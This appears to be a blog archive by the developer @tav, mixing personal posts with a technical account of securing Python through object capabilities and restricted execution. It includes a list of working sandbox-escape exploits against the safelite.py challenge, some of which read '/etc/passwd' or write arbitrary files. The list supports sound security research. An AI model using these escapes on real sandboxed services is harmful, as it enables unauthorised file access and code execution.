But if we are going to prepare for that, we also need to know the rate of the current flow. How long does it take for a meme to become a part of daily life for a population of 10 million people? How long does it take for a meme to be known by 100 million people?

By knowing these and other related data points to “Meme Time”, we would be better placed to adapt. Maybe we are heading towards The Singularity after all?

Would it be possible to start gathering enough statistics to get a relatively accurate picture? How could we do this so that it brings the greatest benefits to everyone? How would we handle the privacy issues?

As usual, let me know your thoughts in the comments. Thanks!

This year has been great for music. My favourite musician, A. R. Rahman, won 2 Oscars whilst my favourite band, Daft Punk, won 2 Grammys!

As much as one might try to hate the French, you just can't knock Daft Punk. Their music is great and they are amazing performers.

But for the love of Google, I have been able to find sweet fuck all for Daft Punk tour dates in 2009.

So if any of you happen to know where they can be seen in the near future, please let me know in the comments!!

And if any of you happen to know them personally, then I'd love for them to perform at my birthday sometime. It doesn't have to be this year, next year is fine too ;p

by moriza

We practised this in face-to-face conversations and found it to be a great success!

Paradoxically, limiting the “bandwidth” led to richer conversations. It encouraged everyone to truly listen to each other and kept issues on topic.

And, most importantly, it put everyone involved on an equal footing — allowing focus to be placed upon the content instead of whoever can dominate the room.

The application of this approach is extremely broad. From resolving personal conflicts to working out the kinks in a new idea. Try the oneline approach on Twitter and let me know how it works out for you.

Oneline Rules:

1. Only 2 people to a oneline dialogue.
2. You must @reply to keep the conversation going.
3. All tweets must end with #oneline.
4. No more than one tweet at a time by each party.
5. It's over if neither party continues within 24 hours.

Recent Onelines:

Krishnamurthy on Listening:

[Also see the more agressive TweetFight variant if you are in the mood for a fight rather than a pleasant conversation.]

TweetFight Rules:

1. Only 2 people to a tweetfight.
2. You must @reply your opponent to keep the fight going.
3. All tweets relating to a fight must end with #tweetfight.
4. No more than one tweet at a time by each party.
5. Fights are over if neither party continues within 12 hours.
6. Last person tweeting wins.

Fights can be civil, intellectual or even foul. It's your choice.

Recent TweetFights:

Credits:

• @evangineer — Idea of a Twitter “Celebrity Death Match”.
• @happyseaurchin — Idea of “one sentence at a time” to facilitate rich conversations.
• @olasofia — The Fight Club metaphor.
• @tav — Design and implementation.

[Also see the more constructive OneLine variant if you are in the mood for a conversation rather than a fight.]

[Well, technically, she got invited and I tagged along as the co-facilitator — aka “Slave”]

The hard working guys at Banana Link had been at this for years now. And the seed for it had been set at the 2nd International Banana Conference.

Our task was to get everyone to talk to each other and commit to being active in a new body that was representative of all in the industry.

And all this in 3 days.

So we shipped over a whole bunch of stationery to Amsterdam and got there in time to check out the venue before heading to dinner with all the other participants.

If we had expected this to be easy in any way, the dinner proved without a doubt that it was going to be an uphill battle. Everyone was pleasant, but there were quite clearly 2 separate camps:

• The small producers from places like the Philippines, Windward Islands, Costa Rica, &c. along with their NGO friendlies like the Fairtrade Foundation.
• The large producers like Chiquita, Dole, &c. who own more than 80% of the Banana export industry and their retailer friendlies.

Many of the representatives even went so far as to keep themselves physically separated across the tables in the restaurant!

But the fact that all these representatives were willing to be here at least was a good sign. The only class of key players who were notably absent were Big Retail: Walmart, Carrefour and Tesco.

So we set to it and over two days a transformation began to take place. The team of interpreters bridged the language gaps whilst Sofia and I took everyone through a bastardised process of World Café, Open Space and Dotmocracy.

And slowly but surely everyone realised that they did in fact share a lot of the same problems and ideals!

Very quickly after that consensus was reached on the Multi-Stakeholder Forum. And everyone, including the big players, made their commitments to it!!

We celebrated the success by dancing the night away in Amsterdam and even managed to hang out with Steve Alexander and his buddies during their Improv Theater performance.

The whole experience was great fun and made us want to bring together similar bodies across all industries! There isn't enough dialogue taking place with real action behind it.

It was also the first time Sofia and I had worked together just by ourselves in an external project and we were great together. It turns out that working together with your girlfriend can be loads of fun!

Finally, I found the experience extremely enlightening. It forced me to go on a crash-course (prior to the event) and learn about the various issues relating to the Banana industry.

And the issues that the various participants brought up helped re-emphasise to me that the solutions provided by the Plex Economy are very much needed. Not just bloggers, musicians and coders — but entire industries — are ready for it!

A few weeks ago I had registered several Twitter accounts for use in an upcoming Twitter application — Tweet20. I'd registered accounts like: @tweetyes, @tweetno, @tweetoffer, @tweetwant and @tweetlocation.

But it turns out that if you register too many accounts concurrently, the Twitter spam controls are triggered. So a little while after the accounts got registered, I found to my surprise that most of them had been suspended!!

Slightly surprised at why non-spam accounts would get suspended — most of those accounts hadn't even been used and were too recent to count as name-squatting! — I got in touch with the Twitter folk and made my case.

But on the first go, my appeal got rejected and the issue was closed. After being pissed off momentarily, I told myself off for depending on other people's platforms and got in touch with the Twitter support staff who had closed the issue.

Del Harvey (@delbius) turned out to be quite pleasant to engage and after a little while, my accounts were re-enabled. Woo!!

In the meantime, I had been helping out Ryan Williams (@ryanwi) on the Twitter-Dev list with getting Twitter OAuth working on App Engine. I put this out as open source for others to use — tweetapp — and promptly forgot about it.

But, much to my pleasant surprise, not only did it get picked up by a Google App Engine Product Manager, Mike Repass (@mdrcode), but Alex Payne (@al3x), the Twitter API lead made the statement you see in the above image — which I discovered whilst reading the GitHub blog!

And thus in the course of a week I had gone from being treated as a spammer by Twitter Inc. to being appreciated by one of its leading members. Down and up we go!

Lesson to take away from this? Just keep on providing demonstrable value and you will be rewarded positively.

Have you had similar turnarounds with other organisations? Or perhaps even with Twitter Inc. too? Let me know in the comments!

There have been many attempts to secure the Python interpreter so that untrusted code can be safely executed alongside trusted code. Working attempts like RestrictedPython and zope.proxy unfortunately come at a high cost in terms of performance.

Old-school Python hackers would probably remember the deprecated rexec module which used to be enabled in the standard library. This module, along with it's Bastion sibling, provided a framework for “restricted execution” of Python code.

The rexec module encouraged a certain design pattern which depended on class attributes being kept “private” from untrusted code. Unfortunately, Python's introspection powers are heavily geared against this and there are many many dark corners from which one can peer deep into the heart of classes.

So it was no surprise that, soon after the introduction of new-style classes in Python, rexec was dumped. And all hopes of securing the Python interpreter in an efficient way went the way of Plan 9.

Now, those in the security world are probably aware of the Object Capability model of security as pioneered by the likes of the Actors model and the E language. Entire Operating Systems have been implemented free of viruses thanks to this model.

For a long while I have felt that there exists a major subset of Python that is suited for use through the object capability model. After all capabilities are just non-forgeable references. We already have this in Python.

The next step is to simply ensure that there is no global shared state. And whilst a lot of existing code uses global shared state, there is nothing in the Python language that imposes this limitation. Thus it should be possible to isolate a capability-secure subset of Python and build up from there.

Since I've had this insight, the Google Caja project have done the exact same for Javascript. They identified a capability-secure subset of Javascript and have built up from there…

So how can we Python hackers get beyond shared state? After all, there is no “private” in Python. Right?

Well, not quite. We can use closures as an easy way of emulating a private scope in Python. After all this is how it's done in other capability-based languages. This is nothing new. Ka-Ping Yee had this insight on Python-Dev years ago!

But what about Python's various introspective powers you ask? Unlike the deep plumbing of classes, Python's functions are relatively isolated and makes our life much easier. This makes sense when you realise that Python classes are actually syntactic sugar and sets of protocols on top of functions.

But functions aren't opaque beasts by default. There are a number of variables which “leak” information. The ones I identified were:

• FunctionType.func_closure/__closure__
• FunctionType.func_code/__code__
• FunctionType.func_globals/__globals__
• GeneratorType.gi_code
• GeneratorType.gi_frame
• type.__subclasses__

And thanks to the Python security challenge using safelite.py we've been able to identify attributes of FrameType as additional ones, e.g.

• FrameType.f_locals

As you can see this is a pretty small list. (Especial thanks to Paul Cannon for being the first with his hardcore hack to show that frame objects are accessible.)

Now this list is in no way the definitive final list. The Python challenge is still ongoing — try safelite.py yourself and see if you can find more! But the fact that there have been no new exploits in the last 24 hours despite over a 1,000 unique downloads of safelite.py in the same time gives me some confidence that we are getting towards a comprehensive list.

If we can ensure that untrusted code will never be able to access the final list of these variables, then we can ensure that “private” data using closures stays private. And from that basis, we can start building an object capability framework in Python!!

In safelite.py, I use ctypes to completely remove these variables from the Python interpreter. This is a neat approach which Phillip J. Eby showed me and means that we can start building an object capability framework in Python today!

The flip-side of removing these variables however is that the code which uses these variables won't work. Boo! So I made getter functions like sys.get_func_code and patched the handful of functions in the standard library like inspect.getargspec to use these instead.

The idea being that trusted code would have a reference to the sys module and be able to use them whilst untrusted code would not. But Guido van Rossum — in the conversation that started here — convinced me that Python already has the support for doing this!

And this is where our old friend rexec deserves some thanking. It turns out that rexec is only one half of Python's restricted execution support. The other half has been living inside the Python Interpreter for well over a decade. For the sake of simplicity let's call this PIRE — Python Interpreter's Restricted Execution.

And since there is seemingly no comprehensive documentation of PIRE, I'll provide a summary here.

Whenever you read/write an attribute on one of Python's builtin objects, it will raise a RuntimeError stating that the attributed is restricted if both of the following conditions are true:

• The attribute has a READ_RESTRICTED and/or WRITE_RESTRICTED flag set.
• PyEval_GetRestricted() returns True.

The flags are set when members of an object are defined. For example, in funcobject.c we find:

static PyMemberDef func_memberlist[] = {
  {"func_closure", T_OBJECT, OFF(func_closure), RESTRICTED|READONLY},
  {"func_doc", T_OBJECT, OFF(func_doc), WRITE_RESTRICTED},
  {"__doc__", T_OBJECT, OFF(func_doc), WRITE_RESTRICTED},
  {"func_globals", T_OBJECT, OFF(func_globals), RESTRICTED|READONLY},
  {"__module__", T_OBJECT, OFF(func_module), WRITE_RESTRICTED},
  {NULL}  /* Sentinel */
};

where RESTRICTED is just a shorthand for READ_RESTRICTED|WRITE_RESTRICTED.

As for PyEval_GetRestricted, a pure Python equivalent would look like:

import __builtin__

def PyEval_GetRestricted():
    """Return if the we are in restricted execution."""

    current_frame = PyEval_GetFrame()
    if current_frame.__builtins__ != __builtin__:
        return True
    else:
        return False

In other words, it checks to see if the __builtins__ variable in the current execution frame is the exact same as the default __builtin__ module [Note the difference in spelling of the two variables]. If they differ, restricted execution is assumed.

Let's see how this works out in practice:

>>> import md5, inspect

>>> def dummy(secret):
...     """A dummy function which creates a closure."""
...
...     def get_secret_hash(hexdigest=True):
...         if hexdigest:
...             return md5.new(secret).hexdigest()
...         return md5.new(secret).digest()
...
...     return get_secret_hash

>>> get_secret_hash = dummy('My Secret.')

In normal execution, we can access the func_closure attribute:

>>> get_secret_hash.func_closure
(<cell at 0x23da10: str object at 0x23ef98>,)

And use that to get at the secret:

>>> get_secret_hash.func_closure[0].cell_contents
'My Secret.'

But if we set the __builtins__ variable, restricted execution mode kicks in:

>>> __builtins__ = {}

>>> get_secret_hash.func_closure
Traceback (most recent call last):
...
RuntimeError: restricted attribute

Tada!!

Now the eagle-eyed amongst you would have noticed the import of the inspect module above. We will use this to show how trusted code can still access restricted attributes whilst within restricted execution. The inspect module has a useful getargspec function which accesses restricted attributes to find a function's signature. And, as we can see, it works even in restricted execution mode:

>>> inspect.getargspec(get_secret_hash)
(['hexdigest'], None, None, (True,))

Why does this work? Because the scope in which getargspec was defined didn't have a custom __builtins__ and this was captured in the getargspec.func_globals. This is just genius! And it provides us with a framework on top of which we can build the object capability secure Python.

All we need to do is add the identified set of leak variables to the existing set of restricted attributes. For those who are not familiar with the internals of PIRE, I present a summary here of the current (in Python's SVN trunk) set of restricted attributes.

The bitwise-OR-able flag contants are defined in structmember.h:

READ_RESTRICTED	Not readable in restricted mode.
WRITE_RESTRICTED	Not writable in restricted mode.
RESTRICTED	Not readable or writable in restricted mode.

In classobject.c, instance method objects:

im_class	RESTRICTED
im_func	RESTRICTED
__func__	RESTRICTED
im_self	RESTRICTED
__self__	RESTRICTED

In classobject.c, class objects:

__dict__	RESTRICTED
__class__	WRITE_RESTRICTED

In classobject.c, instance objects:

__dict__	RESTRICTED
__class__	RESTRICTED

In cPickle.c:

A private copy of the Pickler registry tables is used when PyEval_GetRestricted().

In fileobject.c:

The file() constructor will raise an error when PyEval_GetRestricted().

In funcobject.c, function objects:

func_closure	RESTRICTED
__closure__	RESTRICTED
func_code	RESTRICTED
__code__	RESTRICTED
func_defaults	RESTRICTED
__defaults__	RESTRICTED
func_dict	RESTRICTED
__dict__	RESTRICTED
func_doc	WRITE_RESTRICTED
__doc__	WRITE_RESTRICTED
func_globals	RESTRICTED
__globals__	RESTRICTED
func_name	WRITE_RESTRICTED
__name__	WRITE_RESTRICTED
__module__	WRITE_RESTRICTED

In marshal.c:

Unmarshalling code objects will raise an error when PyEval_GetRestricted().

In methodobject.c, bultin functions:

__self__	RESTRICTED
__module__	WRITE_RESTRICTED

As you can see some of the “leak” attributes that I want to restrict are already restricted in Python! All we need to do is add the following changes:

In codeobject.c:

Creating new code objects directly will raise an error when PyEval_GetRestricted().

In frameobject.c:

All attributes of Frame objects are restricted except for f_restricted.

In genobject.c:

gi_code	RESTRICTED
gi_frame	RESTRICTED

In typeobject.c:

__subclasses__

RESTRICTED

The nice thing about this is that we can then use it in environments like Google App Engine, where we cannot use the ctypes-based approach.

Here's my patch for Python's SVN trunk: pytrunk.secure.patch

You can review the patch for acceptance into Python core here:

• http://codereview.appspot.com/20051/show

With this patch in place (and assuming that there aren't more “leak” attributes lying around), we can start building up a true, secure, object-capability framework in Python.

We'd need to add things like import mechanisms and start whitelisting builtin functions for use. This is a big undertaking and is one that I am committed to — and will appreciate fellow collaborators who want to make this happen. That includes you hopefully =)

Now, some of you may be wondering what the fuss is? Why bother creating such an object capability framework in Python? For that let me give you a few use cases. All on App Engine.

Custom Templates by Users

Web applications like Blogger don't allow users to customise their blogs using a rich language. Instead they have a proprietary templating system which for the most part is just variable substitution.

Imagine instead if you could let your users use a templating language like Genshi. Users could have the full expresivity of the Python language to generate the output they want.

The problem with letting users do that today is that they would be able to use it to get at the rest of your application and start doing evil things to your database.

But with an object capability based framework in place, you could give users the capability to execute Genshi templates without worrying about them somehow getting access to your database.

And the nice thing about App Engine is that they already have something similar to PyPy's sandbox running — so your users won't be able to segfault your processes.

UserScripts: Python Services in Apps

Web applications like Twitter and Facebook provide APIs which let developers write services which run on their own servers. Imagine instead a ‘Plex’ application on App Engine which allowed users to create and run arbitrary Python services on their data.

Not only would this save resources — how many copies of Twitter's database are there?? — but it could allow for interesting and composable services. Perhaps even a command line for the internet?

Services could be provided with a minimal __builtins__ which allowed them to access the current user's data and not anyone else's.

Here's a minimal example to get you thinking:

def create_safe_get(user_id, db=db):
    def _safe_get(key_name):
        return db.get(user_id + key_name)
    return _safe_get

safe_builtins['db_get'] = create_safe_get('tav')

exec(service, {'__builtins__': safe_builtins})

There are lots and lots of possibilities — imagine a GreaseMonkey-like system but running on the server-side and with Python… the possibilities are only limited by our imagination.

But in order for any of this to be possible, the patch has to be accepted first. Guido has already promised to accept the patch (for both Core Python and App Engine!) if it gets reviewed.

So, if you are a Python-Dev-er, can you please review it:

• http://codereview.appspot.com/20051/show

If not, can you at least let Python-Dev know that you'd like to see this patch through? Thanks!

Let me know what you think in the comments below.

— With love, @tav

The challenge is simple:

• Open a fresh Python interpreter and do:

  >>> from safelite import FileReader

• You can use FileReader to read files on your filesystem

• Now find a way to write to the filesystem from your interpreter

You can find the latest version of safelite.py here:

• http://cloud.github.com/downloads/tav/plexnet/safelite.py [Current: v11]

I will keep safelite.py updated as new exploits and workarounds are found until we hopefully end up with a version we can be confident about. [VERSION attribute added on Steven D'Aprano's recommendation.]

If enough smart hackers look at this and it holds up, Guido promises to accept a patch which would enable this function-based approach to security on both App Engine and future Python versions.

So, please try the challenge and let me know how you find it in the comments. Thanks!

Note: The aim of this isn't to protect Python against crashes/segfaults or exhaustion of resources attacks, so those don't count.

Good luck and thanks! =)

Exploits Found & Fixed So Far:

• Victor Stinner and Tim Wintle found the first exploit:

  >>> reload(__builtins__)
  <module '__builtin__' (built-in)>

  >>> open('0wn3d', 'w').write('w00t\n')

  [Fixed in v2]

• Guido van Rossum and Mark Eichin came up with this devious:

  >>> class S(str):
  ...     def __eq__(self, o): return 'r' == o

  >>> f = FileReader('w00t', S('w'))

  >>> f.close() # creates an empty file called 'w00t'

  [Fixed in v3]

• clsn took it further and bypassed the fix in v4:

  >>> class S(str):
  ...     def __eq__(self, o): return 'r' == o
  ...     def __str__(self): return self

  [Fixed in v5]

• Mike Rooney started messing with the assumptions of builtins being unaltered:

  >>> __builtins__.str = S

  [Fixed in v5]

• Farshid Lashkari then took it to a whole new elegant level:

  >>> _real_file = None

  >>> def _new_isinstance(obj,types):
  ...     global _real_file
  ...     if _real_file is None and obj.__class__.__name__ == 'file':
  ...         _real_file = obj.__class__
  ...     return _old_isinstance(obj,types)

  >>> __builtins__.isinstance = _new_isinstance
  >>> FileReader('nul')

  >>> f = _real_file('foo.txt', 'w')

  [Fixed in v5]

• Guido van Rossum noted that FileReader's __metaclass__ was accessible:

  >>> f = FileReader('/etc/passwd')
  >>> kall = f.__class__.__metaclass__.__call__.im_func

  >>> kall(f.__class__.__metaclass__, [('foo', 47)])
  <type 'list'>

  >>> f.__class__.__metaclass__.foo
  47

  [Locked-down in v6 before he could do any real damage ;p]

• Paul Cannon did the unexpected with his super hardcore exploit:

  >>> __builtins__.TypeError = type(lambda: 0)(type(compile('1', 'b', 'eval'))(
  ...   2, 2, 4, 67,
  ...   'y\x08\x00t\x00\x00\x01Wn\x09\x00\x01\x01a\x00\x00n\x01\x00X|\x01\x00|\x00\x00\x83\x01\x00S',
  ...   (None,), ('stuff',), ('g', 'x'), 'q', 'f', 1, ''), globals(), None, (TypeError,)
  ... )

  >>> try:
  ...     FileReader('foo', 2)
  ... except:
  ...     pass

  >>> stuff.tb_frame.f_back.f_locals['open_file']('w00t', 'w').write('yaymore\n')

  [Fixed in v6 — but the principles can still be used. Paul Cannon explains in depth.]

• Daniel Diniz emailed in with this devastating mugging:

  from safelite import FileReader
  
  # Let's build a fake module
  warnings = __builtins__.__class__('warnings')
  
  # Fill it with deception
  warnings.default_action = "ignore"
  
  # And provide a supporting thug
  def __import__(*args):
      print args
      try:
          print "How nice:\n", args[1].keys()
          global sys
          sys = args[1]['sys']
      except Exception, v:
          print "Exception:", v
      return warnings
  
  # Put the bogus module at the doorstep...
  __builtins__.warnings = warnings
  
  # and have the thug replacing the doorman
  __builtins__.__import__ = __import__
  
  # An unsuspecting costumer passes by...
  FileReader('safelite.py').seek(1.1)
  
  # ... and is brutally mugged :)
  print sys
  print dir(sys)
  

  [Fixed in v7]

• Nick Coghlan got evil with context managers:

  >>> class EvilCM(object):
  ...     def __enter__(self):
  ...         return self
  ...     def __exit__(self, exc_type, exc, tb):
  ...         tb.tb_next.tb_frame.f_locals['open_file']('w00t', 'w').write('yay!\n')
  ...         return True

  >>> with EvilCM():
  ...     FileReader(10, 12)

  [Fixed in v8]

• Guido van Rossum emailed in with ways to trick trusted code to evaluate unsafe code in its own globals!! [See also his similar hack with eval in the comments below].

  >>> f = FileReader('/etc/passwd')
  >>> f.__class__.__int__ = input

  >>> f.read(f)
  (fileobj.__class__('/tmp/w00t', 'w').write('w00t\n'), 0)[1]

  [Fixed in v9]

Found an exploit yet?? Try safelite.py and let me know!

• http://github.com/tav

If you want to ever work on a project of mine, just click the fork button on GitHub and start coding — no need to get permission from me! Just let me know if you want to get your changes back into the mainline.

GitHub even lets you edit forks directly from the website without having to check out the repository. How cool is that?!

Now, for the Totally Pointless Awards, I created a colourful homepage using the really nice GitHub pages mechanism:

• http://tav.github.com

And, finally, I have something of potential use for others using GitHub: gitbot.py uses the GitHub API to inform IRC channel(s) of commits to GitHub repositories.

I ended up creating my own one because the default GitHub IRC notifier is rather noisy and joins/leaves too much. You can find the code for the bot along with a sample gitbotconfig.py file here:

• http://github.com/tav/scripts/tree/master

Enjoy!

My apologies to all those who have been following this blog through the RSS feed. As some of you have noticed, the feed has been behaving rather erratically recently.

This is because I have been migrating everything from pleinair.googlecode.com to the new asktav.com domain. This is now the permanent home for my blog and will remain so until the Plexnet eventually replaces the current domain name system.

The feed should be working properly again and is still at the same place as it always was — http://feeds.feedburner.com/asktav. I don't plan to move domains anytime soon so you can expect a certain level of stability now =)

Unfortunately I wasn't able to migrate over the old comments to the new domain. Disqus doesn't seem to have any builtin comment migration across domains feature. So apologies if you look at an article and don't see your comments turning up.

The comments are still there on the Disqus system — just pointing to the wrong URL. I'll try and see if I can leverage the Disqus API to somehow integrate the comments. I really value all of your comments and hope that you understand.

As part of the migration, I also expanded the backend with some additional features:

$ python -m plexnet.tool.article --help
Usage: article.py [options]

Options:
  -h, --help          show this help message and exit
  -a AUTHORS          Set the path for a special authors file (optional)
  -c PACKAGE          Generate documentation for the Python package (optional)
  -d DATA_FILE        Set the path for a persistent data file (optional)
  -e OUTPUT_ENCODING  Set the output encoding (default: utf-8)
  -f FORMAT           Set the output format (default: html)
  -i INPUT_ENCODING   Set the input encoding (default: utf-8)
  -o OUTPUT_PATH      Set the output directory for files (default: $PWD)
  -p PATTERN          Generate index files for the path pattern (optional)
  -r ROOT_PATH        Set the path to the root working directory (optional)
  -t TEMPLATE         Set the path to a template file (optional)
  --quiet             Flag to suppress output
  --stdout            Flag to redirect to stdout instead of to a file

It now supports multiple authors and even generates pretty source documentation for Python packages, as can be seen on the the new domain for the Plexnet: http://www.plexnet.org

The code is sitting a a new source repository with a pretty Rails-based Subversion browser called Warehouse. You can see it @ http://source.plexnet.org.

Thanks for bearing with the upheaval. To make up for it, maybe you'll be interested to know that some others have started blogging too:

• Mamading Ceesay
• Luke Graybill
• Sofia Bustamante

|  george> The theory of blocking off central London is a good
|  george> one but it will still piss people off to fuck.
|
| true. but, we should frame it as pedestrianising for peace as opposed
| to blocking off central london.
|
| although it amounts to the same thing, one is confrontational, the other...
|
|  george> Sounds like the stuff Reclaim The Streets tries to
|  george> do but with better ideas, dialogue instead of
|  george> marching. But that affair always gets hijacked by
|  george> rioters who are pissed off at the police.
|
| surely we shouldn't resign ourselves to accepting that as the only
| possible outcome? if everyone is aware of it before, can't we take
| precautions against it?
|
| on a side note, are people familiar with the roerich banner of peace?
| it's the three red dots symbolising art, science, and religion, with a
| red circle around them representing the totality of culture. the red
| itself represents the colour of the one blood that unites us all.
|
| (btw, can someone come up with an alternative meaning for the third dot?
| religion can be quite shitty...)
|
| here is a quick quote:
|
| //
|   The Roerich Pact and Banner of Peace movement grew rapidly during
|   the early nineteen-thirties, with centers in a number of countries.
|   There were three international conferences, in Bruges, Belgium, in
|   Montevideo, Uruguay, and in Washington, D.C. The Pact itself
|   declared the necessity for protection of the cultural product and
|   activity of the world-both during war and peace-and prescribed the
|   method by which all sites of cultural value would be declared neutral
|   and protected, just as the Red Cross does with hospitals. Indeed,
|   the Roerich Pact was often called The Red Cross of Culture.
|
|   Just as the Red Cross is embodied in a protective sign and banner,
|   so does the Roerich Pact also designate a symbol-the one seen on
|   this page-to be displayed on a banner, The Banner of Peace. This
|   Banner, flown at all sites of cultural activity and historical value,
|   would declare them neutral, independent of combatant forces.
| //
|
| i suggest we adopt the banner of peace for the pedipeace movement. that
| nicholas roerich and ghandi knew and influenced each other lends us even
| more weight.
|
|  george> possible problems could be the way people would
|  george> be spread so thinly that it would be easy for
|  george> the bacon patrol to break up these small groups
|  george> and arrest/beat people without getting too noticed.
|
| good point.
|
| we need to keep the number of circles down until we've gathered enough
| people then. as long as we make people aware of issues like these, then
| they are likely to be relatively sensible?
|
|  george> Do you really think they will allow sound systems
|  george> and parties in the street? They will seize your
|  george> equipment straight away because of that repetitive
|  george> beats law.
|
| then, let's find out more places like those UCL halls on oxford street,
| where we could have sound systems blasting from within the buildings
| themselves.
|
| the key is to get awareness out there. if it's just isolated pockets,
| then it is very easy for them to picked off. but if everyone is doing it...
|
|  george> A huge fiesta taking up the whole of zone 1
|  george> would be amazing though. A lot of people
|  george> would go just for a good time, not caring
|  george> about the causes, and the more people the better.
|
| yes! yes! yes!
|
| (but even those who don't care so much will have their interest piqued
| by the dialogues, and would hopefully gradually end up participating).
|
|  george> But a lot of people that live in central are
|  george> rich and old and used to the world and happy with
|  george> the way things go on, so they won't support
|  george> you, but get pissed off by all the rowdiness.
|
| now, this does worry me. how can we minimise this?
|
| how can we also minimise the impact of the extremist militants / agent
| provocateurs?
|
| how do we ensure that the police will never be able to resort to
| truncheons and tear gases?
|
|  george> It seems the whole protest/marching thing is
|  george> still popular (though showing lack of imagination)
|  george> when people feel strongly about a cause, but a
|  george> lot of the people who do care won't go because
|  george> they won't see the point, so many marches and so
|  george> little effect. The whole idea is stale and so
|  george> usual it goes unnoticed.
|
| right, we all know people (including ourselves), who although they agree
| with the sentiments of no war, at times, don't think it's of any use to
| go down to the marches.
|
|  george> Expressing your discontent is no good if
|  george> no-one listens.
|
| *nod*
|
| one of the reason i find marches such a farce is because of the way they
| are isolated from the rest of society. even on feb 15th, with a million
| odd marching through london, to most londoners it was just a normal
| day... the protests completely separate from their lives.
|
|  george> This is a foolish attitude because it is because
|  george> people choose not to join in that there are not
|  george> enough people to make a difference.
|
| how do we get people to realise this? and, more importantly, to act on it?
|
|  george> If the whole country united for change it
|  george> could come about but too many people take
|  george> the 'one man can't make a difference' attitude.
|
| well, with the dialogues, i'm thinking that we could reverse this mentality.
|
| basically, if you aren't there participating, then you effectively lose
| your voice. so as to encourage all people to come and participate.
|
|  george> Basically, i think the number of people taking
|  george> part in ya proposed idea would be outweighed by
|  george> the number not, and it would be hard to
|  george> organise them.
|
| but, if only a hundred thousand participated on the first day, that's
| still substantial?
|
| do it on a nice sunny sunday... get half a million people down?
|
| i agree about it being difficult to organise them, but it's not impossible.
|
|  george> I think you have too much faith in the genral public.
|
| the general public has to come to realise their own power. otherwise,
| there is no hope.
|
|  george> Although many will agree with you 'in theory' only a
|  george> much smaller hardcore will be motivated enough to
|  george> actually get organised about it...
|
| let's get *everyone* down. this isn't going to be a short war.
|
| we just need to create enough inertia to push people past the "agree in
| theory" phase. it needs to be such a definite, that people will not even
| think of using their cars on that day.
|
| let's sort out alternative bus routes. let's sort out routes to the
| major hospitals so that people's lives aren't endangered.
|
| let's sort out routes for the police so that they can clamp down if
| anyone starts throwing rocks at starbucks. let's sort out traffic routes
| to direct people. let's sort out toilets and dustbins.
|
| let's get people like ms dynamite weaving their magic in the streets.
| let's get *everyone* involved. not just radicals. let's have members of
| parliament having dialogues with the average man on the street. let's
| have policemen participating. let's have teachers. let's have doctors.
|
| let's appeal to mothers of conscience to stand in protection of the
| circles. will police dare beat up pregnant women? will police dare to
| beat up young children? will police dare beat up respected religious
| leaders? will police dare beat up the elderly?
|
| let's have an independent media coverage throughout london. let's setup
| terminals at all tube stations. where people could come and at the push
| of a button print out the latest summary of events and dialogues.
|
|  george> Keep trying and thinking about this hoipefully people
|  george> will soon not be resigned to acceptance.
|
| deep in their hearts, i believe people are tired of the bollocks that
| they put up with on a day to day basis. i believe that people do want a
| better future. they just don't see how it will be possible or what they
| can do.
|
| once they realise that it is possible and that they can help make it a
| reality, i believe that they will awaken.
|
|  george> Also, we are only slaves to oil because we are not
|  george> given alternate energy sources to meet all our needs.
|  george> Sure they exist but reamin out of our hands.
|
| true. but something as simple as not using our cars. and switching over
| our electricity to ecotricity would be a good start...
|
|  chris> i think you can reach people and get them motivated,
|  chris> its all about language.
|
| agreed. it's all about perception.
|
|  chris> Create your own infastructure and co-opt the existing
|  chris> one to reach people.
|
| from a media perspective, i think we are onto a winner here.
|
| see, most road blockades and marches don't get any press coverage not
| because of some global media conspiracy (yes, there is a certain element
| of that), but mainly because it's not news that sells.
|
| *oh look! yet another student has chained herself to a tree!*
|
| just not interesting enough.
|
| we need something that is dynamic. something that will get people's
| minds and hearts racing. something people (i.e. the populace as a whole,
| not just a minority) can get passionate about. something they will buy
| the next days papers to read about.
|
| we can do that here.
|
| we have a sensationalist background of conflict. this will keep people
| on their toes. the police will be out in the thousands. the people will
| be out in the hundreds of thousands.
|
| but that will merely be a backdrop. the key is to refuse to let that
| become the key issue. if we do, then all is lost. so, we should maintain
| the sensationalism of that, yet focus on the dialogue that is important.
|
| let papers be filled with reports sent in from the various circles. let
| papers create maps of what's happening at which crossroads. let papers
| be crammed with wonderful photos of people celebrating life.
|
| let the banners of peace fly. let wonderful smells fill the air. let the
| magical sounds of music sweep people up into ecstasy. let love blossom
| under the spring sun.
|
| we could do experiments in art and science. in art, maybe as a grand
| symbol, we could build a wall around the american embassy like they did
| in rome! in the sciences, we could create community based wireless
| networks! we can do fun things. we can push the boundaries.
|
|  chris> no-one told people that they have to take responsibility
|  chris> for what their country is doing, educate themselves and
|  chris> regain control of their lives. They just used language
|  chris> that contained no responsibility.
|
| chris (and others), could you have a go at phrasing what i am saying
| into "better" words please. i think i am reasonably good at avoiding
| trigger words, and in fact constantly make up new words in order to do
| so, but am sure it could all be phrased a lot better.
|
| thanks!
|
|  matt> the police WILL NOT LET DEMOCRACY OCCUR IN THE STREETS.
|  matt> If you try to make this happen and advertise it as if
|  matt> it will be fluffy and lovely and discursive, you will
|  matt> just be fooling people who will end up with a truncheon
|  matt> in their face.
|
| i beg to differ.
|
| yes, i agree, the inertia is currently against our favour. but we don't
| have to let it be so. the key is for us to strike pre-emptively. not on
| the streets. but in the court of public opinion.
|
| i have been thinking that we should perhaps highlight events such as the
| tiananmen square massacre and genoa. make people aware of what really
| happened. (funny, those chinese were asking for more democracy and
| accurate press coverage just like we are doing so now...).
|
| the developments that took place in the lead up to those events needs to
| become common knowledge. the key here is to do it such that the police
| would not be able to tear gas innocents without a public backlash. at
| the same time, we must take care to avoid instilling paranoia, e.g. the
| black bloc in genoa...
|
| also, what are famous scenes from movies? star wars is pretty good. we
| should make use of strong imagery in movies, books and songs to get the
| point across. we should emphasise the history of the likes of ghandi.
| (perhaps we should all dress up like him?)
|
| the police are, at the end of the day, people just like the rest of us.
| they are influenced by the opinion of others just as we all are. they
| too have children, husbands, wives, mothers, fathers, sisters, brothers,
| friends, lovers. they too are influenced by what those people think.
|
| london can ring with more than that of the truncheon thing! london can
| ring with hope and love. we can take the first step towards creating the
| world we want.
|
|  matt> There will (it looks pretty certain) be a large event
|  matt> within the next three weeks in London which will
|  matt> (hopefully) be similar to the event that happened in
|  matt> San Francisco....roving groups of people stopping
|  matt> business as usual, along with people blocking key
|  matt> intersections to shut down the city.
|
| why hopefully? sf was a disaster.
|
| the actions in san francisco have been counter-productive. it:
|
|   a) as chris says, polarised both activist+public opinion.
|
|   b) gave the polcie (SFPD) a good excuse to use rather draconian
